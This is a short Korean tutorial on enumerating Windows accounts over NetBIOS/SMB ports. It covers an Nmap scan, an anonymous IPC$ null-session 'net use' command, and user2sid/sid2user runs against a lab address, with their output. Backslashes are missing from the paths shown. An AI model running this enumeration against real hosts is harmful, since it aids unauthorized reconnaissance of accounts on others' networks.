OPEN PORT 139,138,136,135 AND HACKING
설치(Windows)
- 먼저 아래의 툴을 다운로드 받는다.
- USER2SID & SID2USER
- NetBios Auditing Tool
사용 방법
- Nmap Tool을 사용하여 Port Scanning을 합니다.( ‘Nmap 설치가이드‘를 참조하세요.)
- 대상 PC 192.168.0.XX에서 139번 포트가 열린 것이 확인됩니다.
- 다운로드 받은 파일을 C: 드라이브에 풀어놓습니다.
- cmd창을 열어 현재 연결 상태를 확인하겠습니다.
C:UsersAdminstrator>net use
새 연결 정보가 저장됩니다.
목록에 항목이 없습니다. - 대상 컴퓨터로 연결해 보겠습니다.
C:UsersAdminstrator>net use 192.168.0.57ipc$ ” /user:””
명령을 잘 실행했습니다.
C:UsersAdminstrator>net use
새 연결 정보가 저장됩니다.
상태 로컬 원격 네트워크
——————————————————————————-
OK 192.168.0.57ipc$ Microsoft Windows Network
명령을 잘 실행했습니다.
- User2sid.exe 활용
C:sid>user2sid.exe 192.168.0.57 guest
S-1-5-21-1401972913-3070510042-2977727395-501 –—> (sid 값 확인)
Number of subauthorities is 5
Domain is WIN8057
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
- sid2user.exe 활용
C:sid>sid2user 192.168.0.57 5 21 1401972913 3070510042 2977727395 500
Name is Administrator (위의 sid값을 카피하여 적용)
Domain is WIN8057
Type of SID is SidTypeUser
- 스캔 정보
컴퓨터 이름 : WIN8057
500 : Adminstrator
501 : guest
1000~ : 모든 사용자 계정을 확인 할 수 있다.